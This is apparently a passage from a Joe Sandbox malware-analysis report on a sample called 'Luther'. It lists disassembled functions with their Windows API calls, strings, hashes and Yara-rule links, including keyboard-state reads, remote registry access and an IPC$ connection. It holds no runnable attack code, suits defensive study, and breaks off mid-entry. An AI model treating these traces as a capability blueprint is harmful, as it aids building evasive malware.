mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E9F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E9F3BE

Strings

close PlayMe, xrefs: 00E9F385, 00E9F3B2
play PlayMe, xrefs: 00E9F3B9
play PlayMe wait, xrefs: 00E9F3A8
alias PlayMe, xrefs: 00E9F34D
open , xrefs: 00E9F323
status PlayMe mode, xrefs: 00E9F36F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: b0aee5e54c9498a6068b16364d75e91fe964f67e381a86a93d69cc5d9cf7931b
Instruction ID: 47aeab4145702d2ef2f97529b1f79812edd3c539631a5cd975534ce8cd112b69
Opcode Fuzzy Hash: b0aee5e54c9498a6068b16364d75e91fe964f67e381a86a93d69cc5d9cf7931b
Instruction Fuzzy Hash: BB119E31A9026D79DB20A676DC4AEFF6EBCEBD2B40F40243AB941F20D0DAB05945C5A1

Function 00E62FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E63007

Part of subcall function 00E62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4), ref: 00E62D4E
Part of subcall function 00E62D38: GetLastError.KERNEL32(00F01DC4,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4,00F01DC4), ref: 00E62D60

_free.LIBCMT ref: 00E63013
_free.LIBCMT ref: 00E6301E
_free.LIBCMT ref: 00E63029
_free.LIBCMT ref: 00E63034
_free.LIBCMT ref: 00E6303F
_free.LIBCMT ref: 00E6304A
_free.LIBCMT ref: 00E63055
_free.LIBCMT ref: 00E63060
_free.LIBCMT ref: 00E6306E

Strings

&, xrefs: 00E62FFE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: &
API String ID: 776569668-2586148540
Opcode ID: 4e8a6b57f704e00e404d1d46265f37d3a57bfdd3d0cfe65f6cd95fc90f86d3ab
Instruction ID: 16204c70300424e4005caec727e1809dc31ee2e830c8d643c932d8410798f7c7
Opcode Fuzzy Hash: 4e8a6b57f704e00e404d1d46265f37d3a57bfdd3d0cfe65f6cd95fc90f86d3ab
Instruction Fuzzy Hash: 3A11B976140508BFCB01EF94D842CDD3BA5EF163D0B8194A9FA08EF222D632DE519B50

Function 00E9A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E9A9D9
SetKeyboardState.USER32(?), ref: 00E9AA44
GetAsyncKeyState.USER32(000000A0), ref: 00E9AA64
GetKeyState.USER32(000000A0), ref: 00E9AA7B
GetAsyncKeyState.USER32(000000A1), ref: 00E9AAAA
GetKeyState.USER32(000000A1), ref: 00E9AABB
GetAsyncKeyState.USER32(00000011), ref: 00E9AAE7
GetKeyState.USER32(00000011), ref: 00E9AAF5
GetAsyncKeyState.USER32(00000012), ref: 00E9AB1E
GetKeyState.USER32(00000012), ref: 00E9AB2C
GetAsyncKeyState.USER32(0000005B), ref: 00E9AB55
GetKeyState.USER32(0000005B), ref: 00E9AB63

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a6545fd3f1fbe6819ed3dc3e50bdcebb13d0d53e3cc82649619731de2e2f29cf
Instruction ID: 36994af1ed8adca4334d393d48d4172f5a2a47d3b1000719bf0b44b18c4da06b
Opcode Fuzzy Hash: a6545fd3f1fbe6819ed3dc3e50bdcebb13d0d53e3cc82649619731de2e2f29cf
Instruction Fuzzy Hash: B4510720A047882AFF31DB649950BEABFF59F41348F0C55A9D5C22B1C2DA649B4CC7A3

Function 00E9662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00E96649
GetWindowRect.USER32(00000000,?), ref: 00E96662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E966C0
GetDlgItem.USER32(?,00000002), ref: 00E966D0
GetWindowRect.USER32(00000000,?), ref: 00E966E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E96736
GetDlgItem.USER32(?,000003E9), ref: 00E96744
GetWindowRect.USER32(00000000,?), ref: 00E96756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E96798
GetDlgItem.USER32(?,000003EA), ref: 00E967AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E967C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00E967CE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 958f0df01815fafb80cd8677c37c7c3f1f7e49db3865e65640b1248e8b138a27
Instruction ID: b0de3ec44a926ab7b9975c3fffd3c89b784c74270ac258e2978a8317ccee50fb
Opcode Fuzzy Hash: 958f0df01815fafb80cd8677c37c7c3f1f7e49db3865e65640b1248e8b138a27
Instruction Fuzzy Hash: 3851FE71A00209AFDF18CFA9DD95AAEBBB5FB48314F10813AF919F6290D771AD05CB50

Function 00E3146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E31488,?,00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E31865

DestroyWindow.USER32(?), ref: 00E31521
KillTimer.USER32(00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E315BB
DestroyAcceleratorTable.USER32(00000000), ref: 00E729B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E729E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E729F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E3145A,00000000), ref: 00E72A15
DeleteObject.GDI32(00000000), ref: 00E72A27

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 31cea7a617359beb9907d8bff3bc1fc552f204623057c4ec7afe975b33497629
Instruction ID: c68ccf5e82b09a076886db90d25d0e86cb585b27260b1d71a6abf75937f31faa
Opcode Fuzzy Hash: 31cea7a617359beb9907d8bff3bc1fc552f204623057c4ec7afe975b33497629
Instruction Fuzzy Hash: 03618A31505705EFCB398F15DD4CB297BF1FB8032AF10A06DE14666660C772A891EB90

Function 00E32128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00E32234: GetWindowLongW.USER32(?,000000EB), ref: 00E32242

GetSysColor.USER32(0000000F), ref: 00E32152

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 16b998e405a12922c91444d17645573acd82c0119a4029f7adc7d22e49b778de
Instruction ID: 35cf4e066f0031a98f9978c84596998a59bc9c9dbdd1617a460f1881a3ce62bf
Opcode Fuzzy Hash: 16b998e405a12922c91444d17645573acd82c0119a4029f7adc7d22e49b778de
Instruction Fuzzy Hash: 1F41C331106644AFDB209F399C4CFB93B65AB42734F145269FBE6A72E1C7329D42EB10

Function 00E9A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00E80D31,00000001,0000138C,00000001,00000000,00000001,?,00EAEEAE,00F02430), ref: 00E9A091
LoadStringW.USER32(00000000,?,00E80D31,00000001), ref: 00E9A09A

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E80D31,00000001,0000138C,00000001,00000000,00000001,?,00EAEEAE,00F02430,?), ref: 00E9A0BC
LoadStringW.USER32(00000000,?,00E80D31,00000001), ref: 00E9A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E9A1E0

Strings

^ ERROR, xrefs: 00E9A175
%s (%d) : ==> %s: %s %s, xrefs: 00E9A1C4
Line %d (File "%s"):, xrefs: 00E9A109
Line %d:, xrefs: 00E9A11A
Error: , xrefs: 00E9A197

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: d627a2b4dc66f7eb688fb2e76f6732c40ff74ea6b8a6fdcfa3448002f1722cbb
Instruction ID: 7deaf9f4837e84ae76813c75fe1c8b26183e4ae8528ca7cdc9fbf4ff568ed8da
Opcode Fuzzy Hash: d627a2b4dc66f7eb688fb2e76f6732c40ff74ea6b8a6fdcfa3448002f1722cbb
Instruction Fuzzy Hash: BD41657280021DAACF14FBE0DD46DEEBBB8AF14340F501065F601B6092DB765F49CBA1

Function 00E90FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E91093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E910AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E910CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E910F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E9111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E91128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E9112D

Strings

\IPC$, xrefs: 00E91075
\CLSID, xrefs: 00E91015
SOFTWARE\Classes\, xrefs: 00E90FFF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: f19cd1bd1890901d80db939f2a02cb8143eca643adc3d55c1b7dccd3612b4cce
Instruction ID: 78603a855087d4df4f7d23262b45137f07c39763d3595d5fa28d16558f5da792
Opcode Fuzzy Hash: f19cd1bd1890901d80db939f2a02cb8143eca643adc3d55c1b7dccd3612b4cce
Instruction Fuzzy Hash: CE41E772C10229AFCF11EBA5DC89DEEBBB8FF04750F405169EA05B6161EB729E05CB50

Function 00EC4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EC4AD9
CreateCompatibleDC.GDI32(00000000), ref: 00EC4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EC4AF3
SelectObject.GDI32(00000000,00000000), ref: 00EC4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00EC4B06
DeleteDC.GDI32(00000000), ref: 00EC4B10
GetWindowLongW.USER32(?,000000EC), ref: 00EC4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00EC4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00EC4B3C

Strings

static, xrefs: 00EC4A71

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: e50ad666036708501058ff0c321c9e56242a08f35a0da3758e0ddfc488e65a2f
Instruction ID: d48924340310b90ecb4a2c13addb0b0f0a5ff0283d35eba14afa87043c4312c1
Opcode Fuzzy Hash: e50ad666036708501058ff0c321c9e56242a08f35a0da3758e0ddfc488e65a2f
Instruction Fuzzy Hash: 38316B71100219AFDF129F65CD08FDA3BA9FF09328F111229FA14B61A0C737D822DB94

Function 00EB468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EB46B9
CoInitialize.OLE32(00000000), ref: 00EB46E7
CoUninitialize.OLE32 ref: 00EB46F1
_wcslen.LIBCMT ref: 00EB478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00EB480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00EB4932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00EB496B
CoGetObject.OLE32(?,00000000,00ED0B64,?), ref: 00EB498A
SetErrorMode.KERNEL32(00000000), ref: 00EB499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EB4A21
VariantClear.OLEAUT32(?), ref: 00EB4A35

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 3385b5f7f098c692a0096e4b3c7fe6b4853626bec1bd77468df6dc3c57a6c8a3
Instruction ID: 308aa070e282a7c190bb130f063a2721cbb972c1c14161bf2bf69520e2f5161c
Opcode Fuzzy Hash: 3385b5f7f098c692a0096e4b3c7fe6b4853626bec1bd77468df6dc3c57a6c8a3
Instruction Fuzzy Hash: 1DC15AB16083019FC704DF68C8849ABB7E9FF89748F00592DF989AB251DB31ED05CB52

Function 00EA84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00EA8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EA85D4
SHGetDesktopFolder.SHELL32(?), ref: 00EA85E8
CoCreateInstance.OLE32(00ED0CD4,00000000,00000001,00EF7E8C,?), ref: 00EA8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EA86B9
CoTaskMemFree.OLE32(?,?), ref: 00EA8711
SHBrowseForFolderW.SHELL32(?), ref: 00EA879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EA87BF
CoTaskMemFree.OLE32(00000000), ref: 00EA87C6
CoTaskMemFree.OLE32(00000000), ref: 00EA881B
CoUninitialize.OLE32 ref: 00EA8821

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: d93a4f0185ce83eb672f2befa7cdaa93c2125225f41c99c809857aaa35af085b
Instruction ID: 73b9aa3cb95f591a1dc554b7bbcb6d9f55a9daeacb16d3fd862aa85654e2b132
Opcode Fuzzy Hash: d93a4f0185ce83eb672f2befa7cdaa93c2125225f41c99c809857aaa35af085b
Instruction Fuzzy Hash: C0C13B75A00205AFCB04DFA4C988DAEBBF5FF49304B1490A9F519EB261DB31ED45CB90

Function 00E90378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E9039F
SafeArrayAllocData.OLEAUT32(?), ref: 00E903F8
VariantInit.OLEAUT32(?), ref: 00E9040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00E9042A
VariantCopy.OLEAUT32(?,?), ref: 00E9047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00E90491
VariantClear.OLEAUT32(?), ref: 00E904A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00E904B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E904BC
VariantClear.OLEAUT32(?), ref: 00E904CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E904D9

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 179d0ab86bca42a275843b513436297633be6be61fd6ac6993f7e669b766b847
Instruction ID: 48c40788b2924d4415e69697d75a4d0f25e124a3be83eac7a9fae1aadb7f6180
Opcode Fuzzy Hash: 179d0ab86bca42a275843b513436297633be6be61fd6ac6993f7e669b766b847
Instruction Fuzzy Hash: 1F416E71A002199FCF04DFA5DC48DAEBBB9FF08354F408039EA65B7261DB31A946CB90

Function 00E9A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E9A65D
GetAsyncKeyState.USER32(000000A0), ref: 00E9A6DE
GetKeyState.USER32(000000A0), ref: 00E9A6F9
GetAsyncKeyState.USER32(000000A1), ref: 00E9A713
GetKeyState.USER32(000000A1), ref: 00E9A728
GetAsyncKeyState.USER32(00000011), ref: 00E9A740
GetKeyState.USER32(00000011), ref: 00E9A752
GetAsyncKeyState.USER32(00000012), ref: 00E9A76A
GetKeyState.USER32(00000012), ref: 00E9A77C
GetAsyncKeyState.USER32(0000005B), ref: 00E9A794
GetKeyState.USER32(0000005B), ref: 00E9A7A6

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e95042745a185110b56bb27349bc0d0dbd7fbdab2d19783ee5f59c34e78cd624
Instruction ID: c4386f6ecbec21560d1641d83d3f7124bba08dab453320ac130cc345b31cf917
Opcode Fuzzy Hash: e95042745a185110b56bb27349bc0d0dbd7fbdab2d19783ee5f59c34e78cd624
Instruction Fuzzy Hash: 6A41C8645047C96EFF315AA4C8057A5BEB0AF1134CF0C907AD5C67A1C2EBA599C8C7D3

Function 00EB9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00EB9750

Part of subcall function 00E99805: _wcslen.LIBCMT ref: 00E99828

_wcslen.LIBCMT ref: 00EB97AB
_wcslen.LIBCMT ref: 00EB97F9
_wcslen.LIBCMT ref: 00EB9839
_wcslen.LIBCMT ref: 00EB98CB

Strings

stdcall, xrefs: 00EB9833, 00EB9838
winapi, xrefs: 00EB97F3, 00EB97F8
cdecl, xrefs: 00EB97A5, 00EB97AA
none, xrefs: 00EB98C2, 00EB98C7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 4bf294b5f432b3321f7f29fd01199296b21cd2fa3f23ee4780013f1280130b99
Instruction ID: b84c33826defbe2fab51dbbfbbdabf2967070e3f95fe991351f8a9ae3a57ef26
Opcode Fuzzy Hash: 4bf294b5f432b3321f7f29fd01199296b21cd2fa3f23ee4780013f1280130b99
Instruction Fuzzy Hash: 7151E331A001169BCF14DF68C9419FFB7E5BF65368B206229EA66F7282DB31DD40C790

Function 00EB4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00EB41D1
CoUninitialize.OLE32 ref: 00EB41DC
